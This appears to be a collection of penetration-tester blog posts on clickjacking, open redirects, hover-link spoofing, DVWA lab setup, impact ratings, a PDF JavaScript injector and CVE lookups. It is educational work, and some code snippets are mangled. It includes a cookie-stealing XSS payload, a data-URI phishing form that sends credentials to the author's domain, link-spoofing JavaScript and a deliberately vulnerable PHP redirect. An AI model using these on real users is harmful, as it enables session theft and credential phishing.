Understanding ClickJacking

ClickJacking is a common flaw in most web applications which allows an attacker to execute actions within the session of their victim. The topic has been very well covered by OWASP at references [1] and [2] at the end of this article.

It is often misunderstood. The following points need to be kept in mind:

  • The user must be authenticated to the TARGET application or it must have some sensitive functionality in there worthy of attack.
  • It must be possible for the TARGET application to be loaded within an html “iframe” tag on another site.
  • The attacker must create an EXPLOIT web page and deliver it to the victim (using Phishing etc).
  • While the victim interacts with content at the EXPLOIT site, their interactions are being redirected to the TARGET application.

The key part is that the EXPLOIT site will present the victim with some content which will encourage them to interact with it. The iframe containing the TARGET site will be hidden in some fashion so that the victim is clueless that they are being exploited.

Additionally, you need to know that this is a “blind” attack by default. By this I mean that you will not have read access to the HTML within the TARGET page (unless that site has some form of self Cross-Site Scripting (XSS) — which is fun, so I will show later).

Think of this as Cross Site Request Forgery (CSRF) [3]. If you find something that can be executed on the target site, which is advantageous to an attacker, but it already has CSRF defences in place? This is the situation where ClickJacking can be your friend.

This post is not about how to actually exploit ClickJacking. It is about how to prove a site has a vulnerability while conducting a penetration test, or for developers to understand the same.

Questions you have to answer

To prove that a site would have an impact from ClickJacking, you need to answer these questions:

  1. Can the site be loaded within an iframe?
  2. Does the target site have something which is actually exploitable using ClickJacking techniques?

The first question is easily answered. Create an HTML file which includes the URL for the sensitive functionality within an iframe tag. The following would do that job:

<iframe src="http://target/function">/iframe>

Change the “src” to point to your juicy function (such as “change email address” or whatever). Save that into a “.html” file locally. Authenticate to the application in one tab of your browser and then open that local file.

If the site loads within the iframe then there are likely no defences in place.

The second question is the one that most people I have taught seem to struggle with. They get excited about seeing the target load in the iframe and rush off to report it!

Hold your horses folks. If there is nothing which would be of value to an attacker to exploit, then it would be a much lower risk. You want to review the website and look for things like:

  • Self-XSS (which is demoed later as a treat to you all).
  • Change Password form without current password required.
  • Change associated email address without current password required.
  • Like or upvote something by way of a click which could improve an attacker’s rating.

The list could be much much longer. Find something that has a security impact and only requires a couple of clicks, or some content controllable by the attacker to be pasted to execute.

If you don’t find functionality like that, then your customer needs to be told they should turn on ClickJacking defences as a matter of best practices. If you do find something then the impact needs to be set dependent on the risks of an attacker doing that to a victim.

That is my point made. The next bit is just for giggles.

Example: Chaining ClickJacking with Self-XSS

Tonight I found “XSSJacking” by dxa4481 on GitHub (see reference [4]). This pretty much did what I came here to show. So I started with that, and then modified it.

You can use ClickJacking to deliver XSS payloads into the session of a victim. This is useful when the way to exploit the XSS would be to literally type the exploit into a text field for example. Until ClickJacking these were basically considered unexploitable. Welcome to the party self-XSS!

I cloned XSSJacking using:

git clone https://github.com/dxa4481/XSSJacking.git

This is pretty simple and has the following files:

  1. index.html – this is the TARGET site.
  2. main.js – contains JavaScript used by index.html (TARGET) to trigger the self-xss.
  3. index2.html – this is the EXPLOIT site.

I wanted to modify these to create an example where I was able to hijack a cookie from TARGET site.

The following is the content of “index.html”:

<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<script src="main.js"></script>

<!-- Added by cornerpirate to create a cookie -->
document.cookie="secret="+new Date().getTime();

<body ng-app="xssApp" ng-controller="mainController">
<textarea placeholer="Vulnerable to XSS" ng-model="textArea" ng-change="checkForAlert(textArea)" style="height:100%; width:100%;">

<!-- Added by cornerpirate to create a div with id "exploitMe" in the page -->
<div id="exploitMe"></div>

To this I added a “div” tag with an id for easy accessing via JavaScript. The following is the content of “main.js”:

var redisApp = angular.module('xssApp', []);
redisApp.controller('mainController', ['$scope', function($scope) {
$scope.checkForAlert = function(text){
// Modified by cornerpirate to dangerously put
// any text into the "innerHTML" of the "exploitMe" div.

I removed the safety from the original demo (because ‘you only live once’). Notice that I use the “innerHTML” of the div to set the “text” which was passed by angular. The following is the content of “index2.html”:

Enter your email below to register:
<textarea autofocus style="width:220px; height:35px;"></textarea>
Repeat your email:
<iframe style="width:230px; height:50px;" frameBorder="0" src=""></iframe>
<input type="submit"></input>
document.addEventListener('copy', function(e){
e.clipboardData.setData('text/plain', '\x3Cimg\x20src\x3D\x22x\x22\x20onerror\x3D\x22new\x20Image\x28\x29.src\x3D\x27http\x3A\x2f\x2flocalhost\x2fcookie\x3F\x27\x2bdocument.cookie\x22\x3E');
e.preventDefault(); // We want our data, not data from any selection, to be written to the clipboard

I modified the URL used by the iframe. This means that the TARGET site is running on TCP port 8080 of my Kali VM.

I also modified the payload which is pasted. That is hard to read so I have decoded it as below:

<img src="x" onerror="new Image().src='http://localhost/cookie?'+document.cookie">

This will simply run a script which will send back a cookie to a listener on localhost. To recap we have this situation:

  1. TARGET site running on TCP port 8080 of kali.
  2. EXPLOIT site running on TCP port 80 of kali
  3. ATTACKER is listening on localhost (yea this should be another server but different origin anyway for the PoC).

By separating the ports they are different origins meaning that ClickJacking will actually get us something.

The following video shows you this all being pulled together:

On the right are two python listeners which host the TARGET and EXPLOIT sites.

On the left is a web browser and ncat listener on localhost.

The steps in the video are:

  1. I refresh the users page on the TARGET site.
  2. I show that there is a cookie set on the TARGET site.
  3. I then  goto the EXPLOIT site and copy the text in the email field. Doing this actually places the XSS payload into the copy/paste buffer.
  4. When I paste into the “repeat your email” it is actually inside the iframe which contains the TARGET site.
  5. The self-XSS executes and you can see the secret cookie value was sent back to the attacker.

To recap: the first half is about what you must do to professionally be able to find ClickJacking. The second gives you an example of what an attack might look like. In the day job of a pentester it is unlikely that you will ever exploit ClickJacking. But for your knowledge of the subject it is best that you play with it.

One day a customer is going to ask and you should have a great answer for them.


[1] https://www.owasp.org/index.php/Clickjacking

[2] https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet

[3] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

[4] https://github.com/dxa4481/XSSJacking

Dodgy Link: Hiding the URL

It is very rare that I do Phishing campaigns (dang it I should ask to do more as they are interesting).  I do have to answer customer questions, and talk about security awareness training often though.

I have heard people saying that “just hover your mouse over a suspicious link and it shows you where it is going!”. Generally this is a good feature of web browsers. However, it is definitely not to be relied on as shown in the video below:

With a tiny bit of JavaScript you can defeat that particular part of someone’s security awareness training. The source code is available below:

<a id="hey" href="http://totallylegit.com"
>Totally Legit</a>

Quite simple:

  1. When the mouse goes over the link the “onmouseover” event handler executes. This changes the URL to “http://www.totallylegit.com&#8221; so that is what the Web Browser shows to the user at the bottom.
  2. If the user actually clicks on the link the “onclick” event is triggered which replaces the URL with whatever we are actually wanting our victim to interact with.

Nothing new. Nothing earth shattering. I needed to document it as I have forgotten how to do this a few times but now it is written down forever. Hope it is useful.

Open (Redirect) Warfare

None of this is new. This week I needed to make an exploit PoC for an open redirect. The short version is this:

  1. Customer had an Open Redirect vulnerability.
  2. This prevented certain things and did have some defences in place.
  3. It did not prevent the “data:” URI.
  4. So this article shows simply how to make a fake login form. *

* various browsers protect users. Mileage on this one definitely varies.

Hopefully the tale of how this was made is of use to someone. It starts by explaining what an Open Redirect is for the uninitiated. It then proceeds by showing a vulnerable PHP page, how to generate the PoC, and then the action shot of it.

What is an Open Redirect?

Ironically our heroes at OWASP have chosen to call theirs “unvalidated redirects” now. Meaning that googling “Open Redirect” finds you this URL:


Which ultimately redirects to this if you flip the “redirect=no” to “redirect=yes”:


But I am old school and like to call it an open redirect. I get the point they are conveying by calling it an unvalidated redirect. I just boo and hiss about being too old for new tricks.

The gist is: by modifying input to a website you are redirecting users to a URL of your choice.

For example, if a website had a URL of the following kind:


If you set the “url” parameter to “https://www.secarma.co.uk“, when the victim clicked on the link they would be redirected to Secarma.

You are all about the impacts Mr Pirate. So explain to me the impact before I throw a brick at you. Ok, ok, I am getting there. There are typically two impacts of an open redirect:

  1. Phishing – Create a malicious link and email (or otherwise present) your victims with it. When they are redirected to your #EvilSite you ask them to enter credentials or something else you need.
  2. Drive by download – if I can make your browser view content that I control then I can attempt to exploit your browser and all of the applications you have installed. Technically this is just a different payload for phishing, but I do see this as a worst case scenario. On a legit penetration testing engagement you should never be simulating this. Imagine the carnage of auto owning browsers for thousands of people?

What an open redirect gains you over simply emailing a link to #EvilSite is simply a little bit of legitimacy. The link will initially point at #TrustedSite but when the browser loads the page it will be forwarded to #EvilSite. If your victim is moderately savvy and checks the hostname in the URL before they click. With an open redirect they would be at risk since the ultimate destination is not the host name of the original link.

Make a vulnerable Open Redirect

You will need a safe place to play with this. Do not go and find something vulnerable on the Internet. Just make your own. I did, and you can see the code below:

		<title>Vulnerable to a redirect</title>
<h3>Page is vulnerable to an open redirect</h3>
Add a parameter to the URL called "url" and resubmit.
if(isset($_GET['url'])) {
$redirect_url = $_GET['url'];
header('Location: ' . $redirect_url); // vulnerable redirect
} ?>

The vulnerable part is the call to the “header” function which uses without checks the value of the get parameter “url”.

Save this in a file “redirect.php”, and place this inside a web server with PHP enabled and start your web server.

Creating your PoC data URI

The data URI is typically used to embed images in my experience. However, it is capable of MIME type “text/html” which makes it dangerous. For this reason various browsers have defended against it as per Mozilla’s post below:


Plough on regardless. Many people surf the old webs in dangerously old web browsers. As a pentester you have to proof of concept where you can. As it happened this was pretty much the only bug we had to play with, so go all out to explain why this is a risk by demonstration.

First you need to create some HTML that may exploit people. I went with a simple (and admittedly ugly looking) login page:

<form onsubmit="myFunction()">
  User: <input type="text" name="user"></br>
  Pass: <input type="password" name="pass"></br>
  <input type="submit" value="Submit">

function myFunction() {
    var gold = document.forms[0].user.value + ":" + document.forms[0].pass.value;
    // send the users credentials to yourself.
    new Image.src="https://cornerpirate.com/stealing?gold=" + encodeURI(gold);
    // redirect user back to the site they are expecting.
    window.location="<set this>";

Pretty simple really. A login form and a JavaScript which runs on submit that sends the credentials back to myself before redirecting the user back to the site they were expecting. That second step is important because you want to minimise the time they spend staring at your form.

To generate my data URI the lazy way I used this excellent free service:


The following shows the process used for doing that:

How to generate your data URI

Pretty simple:

  1. Click on “Provide Text”.
  2. Paste your HTML in.
  3. Click “Explicitly specify mime type”
  4. Type “text/html” in as the mime type.
  5. Click “Generate Data URI”.

This will generate your URI on the screen and you can copy and paste it where you need to.

Using your PoC

Once you have generated your PoC above you will need to URL encode it. This is because the character set for Base64 encoding includes characters used within URLs such as “+” and “=”.

Raw PoC


URL Encoded PoC


Next you will need to generate your exploit URL. If we recall the generic example from before:


It really is as simple as pasting your URL encoded PoC into the spot labelled “INJECT_HERE”.

Bang that into your address bar and press enter and watch as your shoddy looking login form appears. The following shows the flow of this in Burp:

Redirect to data URI

Then to review that in my testing browser:

PoC loaded in the browser

As you can see the address bar looks “scary”. Your suspicious victims will likely spot this. However, some that have been educated to check the hostname BEFORE clicking will already have done their due diligence and moved on to just logging in.

Personally I do not think it is *that* effective as a technique but it did give me a few glimmers of happiness in making the PoC.

Standing Out: a Workshop for Wannabe Pentesters

I asked Twitter for questions to help me find topics people were interested in. The first response was very simple:

To me this boils down to the question “What can I do to make my CV or application stand out from the hordes of others?”. When I say “hordes” I literally mean it. I personally get approached a lot either via LinkedIn or email from candidates.

To deal with that question I have broken it down into three sections:

  1. Sharpen your CV
  2. Your online Content
  3. Your offline presentation

I will make sub-sections for each of these and if you feel that you have one of these nailed skip over it.

Sharpen your CV

Your CV is the gateway to your soul. Often it may be all that the company you are applying to is going to see. For the first step follow this process:

  1. Keep it exactly two pages long. No more. I have heard of hiring managers throwing anything longer on the pile of rejects before they go home and sleep like a baby. Harsh, but nobody said reality was going to be easy.
  2. Write it yourself. If your university has provided a template then you might find that the company has seen your CV many many times before. Familiarity with the format will not make it stand out. You do not have to go insane design wise but making it a bit unique is a good idea. Your CV is a chance to prove you can write in English and sell yourself. If you can do that, then you may be able to sell a vulnerability report to a customer. Genuinely write it yourself and resist temptation to pay someone to write it for you.
  3. Contact Details. Display clearly your contact details with your mobile number and address etc. I have had a few cases where I couldn’t call back, which doesn’t help. In mine I think I made it the header of the page so it is not eating up the real estate on the page but appears at the top of both pages.
  4. Link to online content. The next section contains how to fix your online content. Make sure that your CV links to that content appropriately. If you identify an organisation that blogs regularly about a thing that you have too then highlight that etc. If your research interests and theirs align you will find a willing buyer.

The general idea here is to make something that is the right length, ensure your key information is there, and that YOU wrote it.

Now I do not know how many of you are as hilarious as me? But I also end every CV I write with something outlandish under my interests as a reward to the reader getting that far.

I remember sauntering up to the MD of Pentest Ltd just as he got to the end of my CV when I was heading to meet him. He was still chuckling as I shook his hand. #nailedit. You might not get to an in person interview like that as the first step until you are rocking out as a senior like I was at that point in my career.

Pro-Tip: If you bump into me in person you can ask about my various CV jokes over the years but I won’t go into it here. Otherwise you will probably all just try and emulate those exact things.

Your online Content

There are so many places that you can put things online for your “work” self. A personal blog (like mine here!), LinkedIn, Twitter, GitHub etc. This can all be evidence of your activities that are relevant to penetration testing or IT in general.

Here are somethings I look for which I presume is what other hiring managers want:

  1. Actively exploring technology. If your blog is all about gadgets you have bought and stuff that was done just to play or learn with it. Then you may have the right mindset.
  2. Attending events. If your Twitter feed is a bunch of photos of you rolling around various Cyber Security events then we think you are definitely keen and trying to network in person.
  3. Speaking at events. If you are speaking at things like your local Defcon, OWASP or whatever then you are even more involved. Spreading knowledge to others is very much the mindset. Being able to talk to a room is also a tick in a box for consultancy skills. But speaking to rooms is not for everyone so it is not a REQUIRED skill.
  4. Coding ability. I am of the opinion that coding helps to make a great tester. Relatively recently I started posting stuff on https://www.github.com/cornerpirate. So now I look for people who do the same. You do not have to invent something that has hitherto not existed in the world. Someone who has sat making their own port scanner will have learned a lot. You do not need to shoot for unique. Implementing your own version of a thing is also a valuable exercise.

Try and separate your work and personal self in your online presence. Keep the photos of food to Facebook and Instagram or whatever mostly (I will break this myself deal with it!). Then keep your online career “self” focused and to the point. That means categories on your blog or using a different blog entirely for other things.

What am I looking for here? Well… The appearance you are active. By reading some technical blog posts I can see more about how you write. Remember a pentester has to document findings to customers. So I want to know that you can write. Via GitHub I can see what tools you have made or what problems you have solved. Knowing someone has familiarity with programming is a good idea.

A final word on your online presence. Put a clear picture of your face. I won’t win any beauty contests. But I put my face on things so that when people meet me in person they can recognise me. Yes there are hackers who will post Chinese characters, or ninja’s or whatever to make themselves anonymous. That is very cool and “op seccy” of you. But take a moment to realise you are applying for a career in the white-box and not the black-box. If you want to go break the law for a living I don’t know where you apply but start at the docks at midnight maybe?

By not putting a photograph, what you may be losing a chance for consistency. I have just completed a recruitment tour and have spoken to around 700 or so people in a month. Sometimes I have met people at multiple events. The faces are now vaguely familiar but try to keep that many names in your head? When someone follows me on Twitter after an event it is easier to try and clash whatever hilarious handle they have to the person if I can recognise them.

Pro-Tip: a clear picture of your face only really. Try not to be “the one in the middle of three folks” or something like that ūüôā

If you are represented by a string of binary in green on black in real-life then I promise to try and remember you.

Your offline presentation

By this I mean when you appear in front of a company say at an event. This time you are showing your face and you may have only short time to talk. In that case come prepared. Some people have been handing me business cards in return for mine. That means I can then go and put their name in a spreadsheet for the event and look to see if they actually apply later. So that is a nice touch which I am now recommending.

I didn’t believe in business cards when I was told in 2004 how to get a job by my university. I was like calm down caveman, I’ll just wow them with my personality. Now I have considered what the other side of that coin looks like I say a business card may genuinely help! I have a stack of them now from Securi-tay 2017 ready to get added to a list.

Also you are more likely to remember the companies representative than they are of you. IF you have met them before, re-iterate your name, and where that was when shaking hands. This should tick some boxes in their mind and get you straight onto the “my aren’t they keen” list!

We are fortunate to operate in a hacker style industry. Nobody expects you to wear a suit to these events. So you get a chance to wear some kind of awesome t-shirt or hoodie which may spark a conversation. Your goal at IRL meetings is to literally try and stick in someone’s head for a bit.

Some people do this by trying to ask difficult questions of their prey. Mileage may vary on that one. I love a challenge, but maybe someone else won’t. It is a potential route to making yourself stand out.

There you have it folks. My thoughts on how to “stand out” when applying for a penetration testing career.


Kali with Damn Vulnerable Web App in Docker

If you have landed here I hope you are looking at starting your training with Damn Vulnerable Web App. I am excited for you as you have so much to learn. I hope it means that you are considering a career in Cyber Security, and that this post will save you a few hours of frustration, and get you to the fun bits quicker.

You are going to need access to tools and access to targets so you can explore legally and for free. This post is about getting you to setup two things which will simply provide you with first the tools and then the targets easily:

  1. Kali Linux – the goto distribution of choice for penetration testers at all parts of their careers. A Debian base with repositories that contain all of the most common “hacking” tools.
  2. Docker – I risk offending people with my simplistic definition here. I think of this as a lightweight virtual machine. Really it is a “container” which can include an entire ecosystem.We can use this to clone down vulnerable targets to play with quickly which will run inside our Kali. This will provide the targets.

In this post I will cover setting things up by providing links to the appropriate guides. By the end you will have access to Damn Vulnerable Web App (DVWA) which you can start targeting immediately!


The simplest way to interact with Kali Linux for most readers will be to use virtualisation.

  1. Install vmware player or virtual box. I prefer vmware Player and so the rest of this guide assumes you are using this. Sorry folks.
  2. Download Kali ISO and build a virtual machine.
  3. Boot and log into Kali with the credentials you created.

If all is going well you have a new OS with a fresh desktop environment.

Setup VMWare Tools

Before you go too far you are going to want to setup “VMWare Tools”. This will allow you to copy/paste between your host and guest machine as well as smooth out lots of bumps.

Fortunately there is an easy to follow and official guide here:


By the end of this you should have a more useful virtual machine.

Setup Docker (the Lazy way)

To¬†me docker is not that easy to setup. As Kali is Debian based you may assume that it is simply “apt-get install docker”. This is not the case and a major reason for me writing this post is to make sure you can get Docker into Kali as easily as possible.

The following script was made by some genius called “apolloclark” on Github:

# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get purge lxc-docker*
sudo apt-get purge docker.io*
# add Docker repo
sudo apt-get install -y apt-transport-https ca-certificates
sudo apt-key adv –keyserver hkp://p80.pool.sks-keyservers.net:80 –recv-keys 58118E89F3A912897C070ADBF76221572C52609D
cat > /etc/apt/sources.list.d/docker.list <<'EOF'
deb https://apt.dockerproject.org/repo debian-stretch main
sudo apt-get update
# install Docker
sudo apt-get install -y docker-engine
sudo service docker start
sudo docker run hello-world
# configure Docker user group permissions
sudo groupadd docker
sudo gpasswd -a ${USER} docker
sudo service docker restart
# set Docker to auto-launch on startup
sudo systemctl enable docker

Save this script to a file on your desktop called “getdocker.sh”. Then execute that in a terminal by first “chmod +x getdocker.sh” and then “./getdocker.sh”. This will install docker for you.

I am not going to explain how to actually use docker in the general cases. So you probably want to eventually get round to reading this:


You can skip reading tutorials for Docker right now if you just want to focus on DVWA as soon as possible.

Getting DVWA and Running it

Various people have made docker containers which contain DVWA. At the time of writing the top hit on Google was made by another rockstar called “infoslack”. Open the following URL to see the details:


The following commands are all you would need to execute:

docker pull infoslack/dvwa
docker run -d -p 80:80 infoslack/dvwa

At this point you can access DVWA on localhost port 80.

Check that you are ready

Open this URL in the browser within Kali:


As you have not configured your server yet it will ask you to setup your database:

Setup your DVWA now and get hacking

If you click on “Create / Reset Database” button then you will complete the setup. This will take you to a login page. Enter “admin” and “password” to login.

This will present you with the full interface which will include a long list of options down the left. By default your DVWA install will be set to “Impossible” level of difficulty. You should be unable to exploit any of the vulnerabilities because the code is not designed to be vulnerable at this level.

Click on “DVWA Security” and then alter the drop down from “Impossible” to low and click “Submit”.

At this point you can click on links on the left to load specific vulnerable exercises.

Play safe.



Impact Assessment 101

When interviewing candidates, who have no previous penetration testing experience, there is often a gap in their knowledge. While they have all practised and honed their technical skills they will generally not have practised risk assessment or the impact that a vulnerability would have.

The probable reason for this is that the act of hacking a target is way sexier than trying to categorise or document the fault. There is no impetus to generate a report while you test Damn Vulnerable Web App or the myriad of other safe to play with targets. So exactly why should you?

The difference between a hacker and a consultant is that as a professional you will have to document what you do. You will definitely have to tell the customer exactly what is impacted, who can do it, and for extra points equate that directly to their business if you can.

Failing to do so will generally result in a shrug from your customer and a look in their eye that asks “why should I care?”, while they spin a coke bottle absentmindedly.

In order to work out an appropriate impact rating you are going to need to answer at least these questions:

  1. What is impacted?
  2. Who can locate or exploit the vulnerability?
  3. Are exploit tools and techniques freely available?
  4. Does an attacker need any conditions to be true to exploit the flaw?
  5. If an attacker was to exploit it is there a direct impact to the business?

Simple eh? Let’s work through one example so you can see the reasoning and logic going into an impact rating.

SQL Injection

Anyone with a clue will tell you that SQL Injection is a “high” risk vulnerability. But do you know exactly why? That is the difference I look out for.

A deeper understanding and not simply memorising the impact rating of everything will help you risk the previously unknown flaws. Or deal with the crafty bespoke ones that will never come around again in your career.

To enable me to set an impact I am going to need to spit out a bit on the location of the vulnerability as context is absolutely everything when you are creating an impact rating. Slavishly replaying the same ratings every time without reviewing the context makes a poor consultant. You are being paid to tailor your work to the actual environment and provide the right advice to them.

Overview of the target

The target web application is an e-commerce platform which sells items. It handles personal information for users including their contact details, home address, and their order history. The payment is handled by a 3rd party. The technology stack is Linux running MySQL and Apache. The location is on the product page through the “productId” parameter which is sent in the URL.

What is impacted?

  • Database for certain. With the applications configured user you can: Read, Modify, Insert and Delete data.
  • Potentially the operating system through “file read” and “file write”.
  • Potentially the operating system through command execution though more difficult in MySQL than in some alternative databases.
  • As a pro you will need to confirm these extra “potential” impacts to the operating system. For my simple scenario lets say they have configured away your ability to access or write files, and that you cannot achieve OS command execution.

Who can locate or exploit the vulnerability?

  • The product page is accessed without authentication since people sign in at the point of sale only. There is no authentication barrier to limit knowledge of the flaw, any attacker can find this.

Are exploit tools and techniques freely available?

  • SQL Injection is a well known technique.
  • Training and practical tutorials are free and easy to find.
  • Tools exist such as sqlmap which can automatically find and exploit it WITHOUT needing to know the intricacies of the exploitation.
  • Bottom line: it is very easy to exploit.

Does an attacker need any conditions to be true to exploit the flaw?

  • Short answer: no
  • Longer answer: no user interaction is required to exploit. The attacker is over the Internet so does not require physical access or access to a particular local network. Worth repeating again that it can be found and exploited without authentication.

If an attacker was to exploit it is there a direct impact to the business?

  • There is a direct impact to the business.
  • The personal data that is being stored is identifiable and so would fall under the Data Protection Act in the UK. Should someone dump all the data and then leak that then a fine is likely for the business. Depending on the scale of the breach and the target customer this might be a sufficient fine to cripple their business or close it entirely.
  • There is also a potential reputation damage risk to the business. Consumer trust can be lost and sales will go down.

There we have it all of the ingredients to consider when you think of the impact. There was a slight of hand up there where I split the answer for “what is the impact” into two different entities: the database, and the operating system. I will get back to that in a moment.

First lets explain a simple impact model to you. There is a model called “CIA” which stands for Confidentiality Integrity and Availability. Lets expand a little on these three concepts:

  • Confidentiality – Access to information which an attacker should not have. Pretty simple if an attacker can read your account details or access files from the server then they will know more than they should. The impact of a loss of confidentiality is dependent on the value of the disclosed information.
  • Integrity – Ability to modify information or execute arbitrary commands on a system would affect the integrity. If you change the contents of a web page to suit your needs you have affected the integrity. If you execute an operating system command you cannot trust the server is operating as intended anymore.
  • Availability – If an attacker can simply delete the data or the website content then you will be making it unavailable for legitimate users. If there is another means by which to prevent legitimate users acting as they would like, then you will also have removed availability.

Lets say you provide customers with impact ratings in the categories: high, medium, or low. A very simplistic approach but a fairly effective one and not uncommon in the industry. In order to get to your category of impact you will need to evaluate your vulnerability in terms of the CIA for each answer in “What is impacted?”,

As we provided two entities that are impacted (or potentially so) lets ask and answer ourselves two more questions:

What is the impact rating for the database?

Reminder: our SQL injection has allowed full: read, modify, insert and delete privileges.

Lets fill out the CIA model for the database then:

  • Confidentiality – We can read everything. All user data is at risk including login credentials potentially but definitely including personally identifiable information. There is a “high” impact to confidentiality.
  • Integrity – We can modify everything. You cannot trust the data anymore since an attacker could alter every accounts password, invent new orders etc. There is a “high” impact to integrity.
  • Availability – We can delete everything. Dropping all tables would remove everyone’s orders and their personal information. The site would be dead and nobody could access it or browse the product range. There is a “high” impact to availability.

Three “highs” under CIA? Seems to me we have a “high” impact vulnerability to me, what about you?

What is the impact rating for the operating system?

Reminder: our SQL injection cannot read or write files to the operating system, and cannot execute operating system commands.

Lets fill out the CIA model for the operating system then:

  • Confidentiality – We cannot read files. The impact to confidentiality of data held outside the database on the operating system is non-existent.
  • Integrity – We cannot modify files, and we cannot execute commands. The impact is non-existent.
  • Availability – We cannot execute commands. Even if we “drop all tables” at the database layer the OS would be functioning perfectly. Splitting hairs here because the net effect of dropping all tables is that the site would remain unavailable. But just to be clear the OS is sitting pretty and available.

Three “non-existent” impacts to the OS? Smells like a zero impact issue then.

You would provide customers with one impact rating only. The artistry in penetration testing is being able to calculate all of the potential impacts to arrive at a final snappy answer for the customer. They will often want to order vulnerabilities by the perceived “risk” or “impact” so that they can address the biggest points first.

You always lead with the biggest impact rating which in this case is to the database. You should also make mention of the OS impacts being explored in your report but proving fruitless on this occasion. However, we have arrived at “high” and that is what we go with.

There are various other models for calculating risk or impact and if you love a number from 0.0 to 10.0 then check out CVSS in particular. It is a fully fledged formulae which embeds the concept of CIA reasonably well. As with my process above you would need to calculate multiple risks based on what is being affected and then select the highest rating.

The problem is that CVSS does not always sit well with every type of potential risk you may need to capture in your report. For those fiddly bespoke ones you sometimes have to get your hands dirty and pick a “high”, “medium” or “low” out of the air.

Now that you have read this you will know exactly what to do on that day.

Using JS2PDFInjector to check risks of PDF files with embedded JavaScript

Lets do a very short script for a play to set the scene for this one. Positions everyone:

CornerPirate: Love PDF? Love your JavaScript? Everyone’s favourite office file format and interactive code engine together!

*interlocks his finger*

CornerPirate: Let’s weave them together. What could possibly go wrong?

What could possibly go wrong indeed. No point dallying you can find out how that could go wrong at these places:

These are all way more detailed than I would choose to go on the subject and are worth a read.

Probably a great idea to make sure that your email, and Internet proxy blocks them coming inbound then isn’t it?

This post will show you a tool which can be used to inject JavaScript into a PDF so that you can evaluate your own inbound filtering system’s.

Get the tool

You can get the source and the built jar from the repository below:


Download the zip or clone it down it is your choice.

Using it

Goto the “dist” directory and run the jar file. In Windows you can double click on the jar if you have the Java Runtime installed. Alternatively you can run:

java -jar JS2PDFInjector.jar

When it launches it will:

  1. Ask you to select a PDF file to inject into.
  2. Ask you to select a file containing JavaScript that you want to run when users open the PDF.
  3. Create the new PDF with “js_injected_” into the file name and make a new file in the same directory as the original PDF.

Pretty simple I think. It could be a command line tool. But meh I wanted file choosers for some reason that day. You have the source so go fix it if you like.

Creating Payloads

The JavaScript APIs are slightly different from those you might be familiar with in web browsers. In order to understand exactly how to create payloads you are going to need to understand the APIs here:

Click to access js_api_reference.pdf

As a pentester it is usually sufficient for me to simply evaluate the defences strip all JS from a PDF or quarantine the file on the way in. If your solution does not then I can infer that you could be doing more to protect yourself.

So for me it has been enough to go with a simple alert message like this one:

app.alert("Hello world!");

If you want to weaponize this by injecting malicious things, then you do so at your own legal risk and I am not responsible for your actions.

I just felt that if this was in anyway useful to someone then I should share it!

How to use your file legitimately

So you found this blog because you wanted to evaluate your companies defences against PDF’s with malware written in JavaScript? Awesome.

  1. Test your Anti-Virus [Local Only Test]
    1. Upload your PDF onto a server or workstation you want to test by USB or whatever works in your environment locally.
    2. Right click and scan with your anti-virus solution and see if it says anything.
    3. The chances are your PDF does not match any signature since you have made it yourself. However, if you have configured a solution which says it “warns when a PDF has JavaScript” or it “quarantines” such files. Check to see that it has found it.
    4. For bonus points if your AV is configured to log events centrally make sure someone has seen the log alert and has kicked off an investigation.
  2. Test your Email Filtering
    1. Use an external email address to email your PDF into a work address.
    2. If you have a complex system which has multiple in-line inspection points before it reaches a user. If the email arrives with the attachment intact and it triggers an alert or whatever your payload is in Adobe Reader? Then you should repeat step one (Local AV scan). Your company is at risk as you have found people can email in potentially dangerous PDF files. Repeating the AV scan manually will see if it will ever find that file. At this point the payload has already run and you have been compromised.
    3. If the email arrived but Adobe does not execute your payload. The chances are that you have something in-line before it hits users. This has attempted to remove the JavaScript from the PDF file but leave the original viewable content. Investigate on your filtering systems which component has done this and see if there was an appropriate alert raised and an investigation by a member of staff. This is still evidence that somebody *tried* to target your users.
  3. Test your Internet proxy Filtering
    1. Upload your PDF file to an Internet web server. It has to be the Internet because Microsoft’s various web browsers implements a “zone” model for security. The Internet zone is the least trusted so the fairest evaluation.
    2. Download the file in the default web browser for your users going through all Internet proxy and inspection routes.
    3. If the payload executes when opened in Adobe. Then you have found another route to download PDF files with JavaScript onto your target machine from an external source. Repeat step one to see if you have a last ditch defence in the AV. However, it is worth noting that the AV allowed the payload to run so…. hmmmm. You are already compromised and should look at the AV solution.
    4. Again. If the payload did not execute. Try to investigate where in the chain it happened, and then look for staff to have reacted to that alert.

You can take these techniques and alter them for all other routes into your organisation. A file-upload on a website? An SFTP service etc.

Hope that helps



Using CVE data, with CVE-Offline

Tl; dr version – I made a thing that makes the bulk of CVE vulnerability details easy to grep for use when reporting. Get it here: https://github.com/cornerpirate/cve-offline. I update it once a month from the NIST database.

Anyone sticking around to read the rest gets a process for checking for known weaknesses in a service. Rationales for why, as well as a bit about how to use CVE-Offline.

Rationale and Process for vulnerability identification

When writing penetration test reports you will need to interact with many online resources to do that well. The simplest thing that you should do is include a summary of any known weaknesses within an installed version of software.

The biggest database of shared vulnerability knowledge is the CVE database. An overview of that is available at the URL below:


Almost every vulnerability in common services will result in a vendor patch AND an entry with a unique CVE identifier. When you are targeting a customer you need to compile a list of known flaws. This is so you can advise them of the exact technical risk posed by using version X of Apache on the day the test was conducted (as an example, not to pick on Apache).

To do this, you can follow the process outlined below:

  1. Identify a service version – “nmap -sV -p <portnumber> <ip>” will to this in most cases.
  2. Look for known vulnerabilities in version – If you are using Nessus, or an alternative vulnerability scanner, they do a pretty decent job of maintaining their database of CVE issues. “IF $version == x.x.x THEN vulnerable to x,y,z” is the logic they use.
    1. If the service is unknown to your vulnerability scanner you will have to find your own list of CVEs if possible. Look up the vendor and product on http://www.cvedetails.com/.
    2. They have an export facility of sorts so you can use the output for your product to achieve what CVE-Offline does when you have an Internet connection.
    3. Alternatively, you are going to have to find the release notes, bug tracker, or change log for your target service. They usually track security defects using CVE references. This is not universal though.
  3. Format your list for your report – now that you have a list you are going to want to present them to your customer.
    1. If your list of vulnerabilities is around 20 you can probably show a summary of each issue to the customer.
    2. If the list is ENORMOUS, then are you adding much value in creating 20 pages in your report? Probably not.
